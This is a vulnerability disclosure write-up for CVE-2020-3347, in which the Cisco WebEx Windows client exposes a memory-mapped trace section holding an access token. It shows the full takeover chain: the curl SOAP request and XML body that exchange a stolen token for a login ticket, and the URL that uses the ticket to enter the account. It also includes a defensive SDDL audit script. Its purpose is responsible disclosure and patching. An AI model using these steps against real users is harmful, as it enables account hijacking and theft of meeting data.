Cisco WebEx Memory for the Taking: CVE-2020-3347

Overview

Due to the global pandemic of COVID-19, there’s been an explosion of video conferencing and messaging software usage to help people transition their work life to a work-from-home environment. Vulnerabilities in this type of software now present an even greater risk to its users. Cisco WebEx is one of the most popular video conferencing solutions available, so I decided to turn my research skills to see how secure the platform is. While I did find a relatively severe memory information leakage vulnerability, we worked with Cisco through our responsible disclosure program to get this vulnerability patched.

Cisco WebEx Memory Vulnerability: CVE-2020-3347

The following applies to Cisco Webex Meetings client on Windows, version 40.4.12.8:

Once the application is installed, it adds a tray app that starts when a user logs on, along with some dependent processes. If the user has configured the client to log in automatically (the default case), the following applies.

The client keeps several memory-mapped files (sections, in Windows terms) open, and some of them are not protected against being opened for reading or writing by any other Windows user. Specifically, there is a section called:

\Sessions\<session id>\BaseNamedObjects\WBXTRA_TRACE_FILE_EX

Based on the file name, it appears to hold some trace information. Malicious users can open and dump the contents of this file if they can log on to the machine. Simply put, another user can loop over sessions and try to open, read, and save interesting content for future inspection.
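For defenders, the exposure described above comes down to the access control list on a named section. The following added example (not part of the original post or the advisory) audits the SDDL form of a section's security descriptor and reports allow ACEs that let broad groups map it for reading or writing. It assumes the SDDL string has already been exported with a tool of your choice; the function names and sample strings are constructed for illustration, and deny ACEs are not evaluated.

```python
import re

SECTION_MAP_WRITE, SECTION_MAP_READ = 0x2, 0x4
# SDDL right codes that can grant the map bits; other codes count as 0.
CODES = {"GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000,
         "DC": 0x2, "LC": 0x4, "FA": 0x1F01FF, "FW": 0x120116,
         "KA": 0xF003F, "KW": 0x20006}
# Generic rights as the section object type maps them.
GENERIC_MAP = {0x10000000: SECTION_MAP_READ | SECTION_MAP_WRITE,
               0x80000000: SECTION_MAP_READ, 0x40000000: SECTION_MAP_WRITE}
# Trustees that cover users other than the section's creator.
BROAD = {"WD": "Everyone", "S-1-1-0": "Everyone",
         "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
         "BU": "Users", "S-1-5-32-545": "Users",
         "IU": "Interactive", "S-1-5-4": "Interactive"}

def access_mask(rights):
    """Turn an SDDL rights field (hex or two-letter codes) into a mask."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
    else:
        mask = 0
        for code in re.findall("[A-Z]{2}", rights):
            mask |= CODES.get(code, 0)
    for generic_bit, mapped in GENERIC_MAP.items():
        if mask & generic_bit:
            mask |= mapped
    return mask

def audit_section_sddl(sddl):
    """List (trustee, access) pairs where an allow ACE exposes the section."""
    dacl = re.search(r"D:([^()]*)((?:\([^)]*\))*)", sddl)
    if dacl is None or "NO_ACCESS_CONTROL" in dacl.group(1):
        return [("Everyone", "read+write (no DACL)")]
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(2)):
        ace_type, _flags, rights, _obj, _inh, sid = ace.split(";")[:6]
        mask = access_mask(rights)
        modes = [name for bit, name in ((SECTION_MAP_READ, "read"),
                                        (SECTION_MAP_WRITE, "write")) if mask & bit]
        if ace_type == "A" and sid in BROAD and modes:
            findings.append((BROAD[sid], "+".join(modes)))
    return findings

if __name__ == "__main__":
    # Constructed samples: open to Everyone vs. SYSTEM plus one made-up user SID.
    weak = "O:BAG:SYD:(A;;0xf001f;;;WD)(A;;GA;;;SY)"
    tight = "O:BAG:SYD:P(A;;GA;;;SY)(A;;GA;;;S-1-5-21-1111-2222-3333-1001)"
    for sample in (weak, tight):
        print(audit_section_sddl(sample))
```

An empty result means no allow ACE in the DACL hands map access to Everyone, Authenticated Users, Users or Interactive; any finding on a section that carries trace or credential data deserves a closer look.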

I found that the file always contains the following sensitive information:

  • E-mail account used as a login
  • URL used to host meetings

When a user starts a meeting, the trace file will also contain a WebExAccessToken, which allows anyone to impersonate the user and get access to the WebEx account.

A POC program provided in the advisory opens the memory-mapped file for reading and dumps its contents to disk. Once the victim starts a meeting, the dump will contain something like this:

[Image: dump excerpt showing a Bearer token]

All the attacker needs to do now is to grab the Bearer token from the dump file and use it in the following HTTP POST request:

curl -d @get_token.xml -O https://homeabc.my.webex.com/WBXService/XMLService

Contents of get_token.xml file:

<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<header>
<securityContext>
<webExID>user@host.name</webExID>
<partnerID>PT</partnerID>
<siteName>home-abc.my</siteName>
<clientInfo>CiscoWebexMeetings-Win/40.6.2</clientInfo>
<webExAccessToken>
eyJhbGci...
</webExAccessToken>
</securityContext>
</header>
<body>
<bodyContent xsi:type="java:com.webex.service.binding.user.GetLoginTicket"></bodyContent>
</body>
</serv:message>

In response, a one-time login ticket will arrive:

[Image: response containing the one-time login ticket]

The next step is to open the following URL in a browser to get control of the victim’s account:

https://home-abc.my.webex.com//home-abc.my/mywebex/tool/frame/mywebexframe.php?MWAT=mw&strUserName=user%40host.name&TK=b30866fa388c26cf5efda0cd6dfee20b8a60163123bddcbfafb46c54700f2448&UTF8=1&SubMenu=PTPMR

The TK value in the URL (shown in red in the original) comes from the above SOAP request, which uses the WebExAccessToken from the dump.

Voilà:

[Image]

Using the leaked information, I was able to access my own account from another machine with a different IP address. It allowed me to see all meetings along with invited parties and meeting password (if set), download past meeting recordings, and so on. Here's the entire attack:

Summary

In an attack scenario, any malicious local user or malicious process running on a computer where WebEx Client for Windows is installed can monitor the memory-mapped file for a login token. Once found, the token, like any leaked credential, can be transmitted elsewhere and used to log in to the WebEx account in question, download recordings, view or edit meetings, and so on.

Users of Cisco WebEx for Windows are advised to upgrade to version 40.6.0 or the most current version as soon as possible.

Reference

Trustwave Advisory: TWSL2020-003:
Cisco Advisory for CVE-2020-3347: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt
